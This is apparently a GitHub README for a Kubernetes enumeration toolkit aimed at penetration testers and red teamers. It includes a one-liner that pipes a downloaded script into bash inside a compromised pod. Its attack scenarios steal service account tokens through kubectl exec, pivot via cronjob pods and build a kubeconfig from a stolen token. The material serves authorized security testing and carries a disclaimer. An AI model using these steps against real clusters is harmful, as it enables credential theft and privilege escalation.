Kubernetes Enumeration Tools for Penetration Testing & Red Team Operations
k8s-enum is a set of Kubernetes security enumeration scripts designed for penetration testers, red teamers, and security researchers. Inspired by LinPEAS, these tools provide comprehensive enumeration with color-coded output highlighting privilege escalation vectors and misconfigurations.
The toolkit includes two specialized scripts:
k8s-enum.sh- External enumeration using kubeconfig filesk8s-pod-enum.sh- Internal enumeration from inside a compromised pod
Use this when you have obtained kubeconfig files or service account tokens and want to enumerate the cluster from your attack machine.
./k8s-enum.sh --profile <kubeconfig-file>Use this when you've compromised a container/pod and want to enumerate your Kubernetes access from inside the cluster.
./k8s-pod-enum.sh# Clone the repository
git clone https://github.com/ahrixia/k8s-enum.sh.git
cd k8s-enum
# Make executable
chmod +x k8s-enum.sh
# Run with your kubeconfig
./k8s-enum.sh --profile ./stolen-kubeconfig.yaml
# Enumerate specific namespace
./k8s-enum.sh --profile ./config.yaml --namespace kube-system
# Enumerate all namespaces
./k8s-enum.sh --profile ./config.yaml --all-ns# Download directly into compromised pod
curl -O https://raw.githubusercontent.com/ahrixia/k8s-enum.sh/main/k8s-pod-enum.sh
chmod +x k8s-pod-enum.sh
./k8s-pod-enum.sh
# Or one-liner
curl -sL https://raw.githubusercontent.com/ahrixia/k8s-enum.sh/main/k8s-pod-enum.sh | bash| Color | Meaning |
|---|---|
| π΄ Red (Bold) | CRITICAL - Immediate privilege escalation possible |
| π΄ Red | HIGH - Significant security finding |
| π‘ Yellow | MEDIUM - Potential security issue |
| π’ Green | LOW/INFO - Informational finding |
| π΅ Cyan | General information |
- β
Permission Enumeration -
auth can-i --listwith analysis - β Dangerous Permission Detection - Highlights exec, secrets, impersonate, create pods
- β Namespace Enumeration - Lists all accessible namespaces
- β Pod Enumeration - Lists pods with service account info
- β Service Enumeration - Identifies exposed NodePort/LoadBalancer services
- β Secret Enumeration - Lists accessible secrets
- β ServiceAccount Enumeration - Maps service accounts across namespaces
- β CronJob Analysis - Identifies cronjobs with privileged SAs
- β RBAC Enumeration - Roles, ClusterRoles, Bindings
- β Impersonation Detection - Finds impersonation targets
- β Actionable Recommendations - "What to do next" for each finding
- β Auto-detects mounted service account token
- β JWT Token Decoding - Extracts SA name, namespace, pod info
- β Works without kubectl - Falls back to curl API calls
- β Container Escape Vectors - Checks docker.sock, host mounts, capabilities
- β Cloud Metadata Access - AWS/GCP/Azure IMDS checks
- β Network Enumeration - Interfaces, ports, internal services
- β Privilege Escalation Paths - Identifies privesc opportunities
The scripts specifically look for these dangerous permissions:
| Permission | Risk Level | Impact |
|---|---|---|
pods/exec create |
CRITICAL | Remote code execution in any pod |
secrets get/list |
CRITICAL | Credential extraction |
pods create |
CRITICAL | Container escape via privileged pod |
serviceaccounts impersonate |
CRITICAL | Privilege escalation |
rolebindings create |
CRITICAL | Self-privilege escalation |
serviceaccounts/token create |
HIGH | Token generation for other SAs |
cronjobs create |
HIGH | Persistence mechanism |
daemonsets create |
HIGH | Cluster-wide code execution |
- Docker socket (
/var/run/docker.sock) - Host filesystem mounts (
/host,/hostfs,/rootfs) - Privileged container detection
- Host namespace access (PID, Network, IPC)
- Linux capabilities analysis
- Cloud metadata service access
# You obtained a kubeconfig from a developer's laptop
./k8s-enum.sh --profile ./dev-kubeconfig.yaml
# Check what the service account can do
# If it finds impersonation, try:
kubectl --kubeconfig=./dev-kubeconfig.yaml auth can-i --list \
--as=system:serviceaccount:default:admin-sa# Inside a compromised container
./k8s-pod-enum.sh
# If it finds pods/exec permission, pivot:
kubectl exec -it other-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token# 1. Enumerate with low-priv SA
./k8s-enum.sh --profile ./low-priv.yaml
# 2. Find cronjob with higher-priv SA
kubectl get cronjob -o yaml | grep serviceAccount
# 3. Exec into cronjob pod, steal token
kubectl exec -it cronjob-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token
# 4. Create new kubeconfig with stolen token
# 5. Re-enumerate with higher privileges
./k8s-enum.sh --profile ./high-priv.yaml| Flag | Description |
|---|---|
--profile, -p |
Path to kubeconfig file (required) |
--namespace, -n |
Target specific namespace |
--all-ns |
Enumerate all namespaces |
--quick |
Skip slow checks (RBAC, impersonation) |
--help, -h |
Show help message |
| Flag | Description |
|---|---|
--api-server, -a |
Override API server URL |
--help, -h |
Show help message |
When you extract a service account token, create a kubeconfig:
apiVersion: v1
kind: Config
clusters:
- name: target-cluster
cluster:
server: https://<API-SERVER>:443
certificate-authority-data: <BASE64-CA-CERT>
users:
- name: stolen-sa
user:
token: <STOLEN-TOKEN>
contexts:
- name: attack-context
context:
cluster: target-cluster
user: stolen-sa
namespace: <NAMESPACE>
current-context: attack-contextOr use the one-liner:
kubectl config set-cluster k8s --server=https://<IP>:443 --certificate-authority=ca.crt
kubectl config set-credentials user --token=$(cat token)
kubectl config set-context ctx --cluster=k8s --user=user
kubectl config use-context ctxThese tools were developed and used during the K8s-RTA (Kubernetes Red Team Analyst) Exam.
These tools are intended for authorized security testing only. Only use these scripts on systems you have explicit permission to test. Unauthorized access to computer systems is illegal.
The author is not responsible for any misuse or damage caused by these tools.
This project is licensed under the MIT License - see the LICENSE file for details.
If you find this useful, give it a β!